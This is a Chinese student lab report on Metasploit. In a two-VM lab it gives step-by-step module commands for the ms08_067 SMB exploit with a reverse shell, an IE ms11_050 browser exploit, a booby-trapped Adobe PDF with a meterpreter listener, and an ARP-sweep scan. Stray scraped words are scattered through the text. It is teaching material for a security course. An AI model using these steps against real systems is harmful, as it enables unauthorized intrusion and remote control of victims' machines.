本实践目标,掌握metasploit的基本应用方式,掌握经常使用的三种攻击方式的思路。具体须要完成(1)一个主动攻击,如ms08_067;(2)一个针对浏览器的攻击,如ms11_050;(3)一个针对客户端的攻击,如Adobe(4)成功应用任何一个辅助模块。
以上四个小实践可不限于以上示例,并要求至少有一个是和其余全部同窗不同的,不然扣除0.5分。html
一、两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)。
二、在VMware中设置两台虚拟机网络为NAT模式,自动分配IP地址,以后两台虚拟机就能够直接ping通。
这之间遇到了一个问题,电脑卡死了致使再打开kali的时候发现ip不对,不会调,结果偶然间发现n年前快照过一次,恢复快照后又能用了
若是ping不通,通常是ip地址不在同一个网段上,须要从新设置xp的ip地址,打开:控制面板->网络链接->右击本地链接选择属性->选择internet协议(TCP/IP)->属性,就能够编辑ip地址了。例如:kali ip是192.168.23.129,xp ip设置为:192.168.23.128。前三位同样,最后一位随便设置。
sql
3.在kali终端中开启msfconsole。
4.输入命令search ms08_067,会显示出找到的渗透模块,以下图所示
5.输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。shell
六、输入命令show payload会显示出有效的攻击载荷,以下图所示,咱们找到一个shell_reverse_tcp。
数据库
7.命令show targets会显示出能够被攻击的靶机的操做系统型号。
8.使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。windows
九、输入命令show options显示咱们须要在攻击前须要设置的数据。
api
十、输入命令浏览器
set LHOST "kali Ip"安全
set RHOST "Win xp Ip
十一、输入命令exploit开始攻击,以下图所示是正常攻击成功结果
网络
1.在kali终端中开启msfconsole。session
二、输入命令use windows/browser/ms11_050_mshtml_cobjectelement,进入该漏洞模块。
三、输入info查看信息:
4.设置对应的载荷set payload windows/meterpreter/reverse_tcp
五、show options查看须要设置的相关信息
六、设置相关信息
set LHOST ‘kali Ip’
set LPORT XXXX
set URIPATH XX
七、exploit,以下图所示,有靶机须要访问的ip地址:
八、在靶机IE上输入网址,并在靶机上查看信息。
到了这里我遇到了一个问题,就是sp3里面的浏览器不是ie7,因此上图会显示成那样,没有session 1,后来我又尝试下了不少ie7的安装包可是实在是太卡了并且无数盗版,因此就没有再作下去,若是换了浏览器理论上是能够作出结果的我距离结果也就差一步,可是这个实验要求上说的很清楚,“掌握metasploit的基本应用方式,掌握经常使用的三种攻击方式的思路”,重点在掌握思路,因此我就没有在作下去,若是扣分的话请老师在评论区里说一下要扣分我就把这个补上。
一、两台虚拟机,其中一台为kali,一台为windows xp sp3。
二、设置虚拟机网络为NAT模式,保证两台虚拟机能够ping通。
三、kali下打开显示隐藏文件,以下图,先打开主文件夹,在右上角打开以下图所示位置:
4.在kali终端中开启msfconsole。
五、输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。
六、使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。
七、输入命令show options显示咱们须要在攻击前须要设置的数据.
8.输入命令
set FILENAME xxx.pdf
set LHOST "KALI Ip"
set LPORT xxxx
9.输入exploit,生成pdf文件,并能够看到pdf所在文件夹,将pdf复制到靶机里。
10.使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。
十一、使用set payload windows/meterpreter/reverse_tcp创建一个反向链接。以下图所示,我须要输入命令set LPORT 5555和攻击模块里的数据设置为同样的。
十二、使用命令exploit开始攻击,在xp中打开pdf。以下图:
这很明显,攻击成功了
1.将kali机的模式改成桥接模式,使他和主机ping通,主机链接的是无线网。
2.先手动建立一个msf所需的数据库
service postgresql start
msfdb start
三、开启msf
4.输入命令 use auxiliary/scanner/discovery/arp_sweep进入模块
5.show options查看须要设置的消息,其中rhost填写本身电脑所在网段
6.使用命令,设置
set interface eth0
set RHOSTS 172.30.1.0/21
set threads 2
7.run
应该是网络的问题,它提示没有ipv4的地址,并且个人虚拟机提示网桥没有正确打开,网桥崩了,求解决方案。
解决了以后有了ip
run以后结果:
当时宿舍没人用电脑,嗯,的确是这样。并且貌似打开防火墙的话扫描不到。
实验指导(http://www.cnblogs.com/yayaer/p/6685527.html)
1.实验后回答问题
(1)用本身的话解释什么是exploit,payload,encode.
exploit:在kali里面进行攻击的时候要使用的代码是exploit
payload:目测来看是一种攻击载体,然而我并不知道什么事攻击载体,感受相似于声音借助于空气转播,声音是恶意代码,人类是靶机,空气就是payload
encode:直译为编码,顾名思义就是把恶意代码进行编码而后免杀
2.实验总结与体会
3.实践过程记录,体现学号,可记录本身认为重要的或思考过的点,不须要每步都记录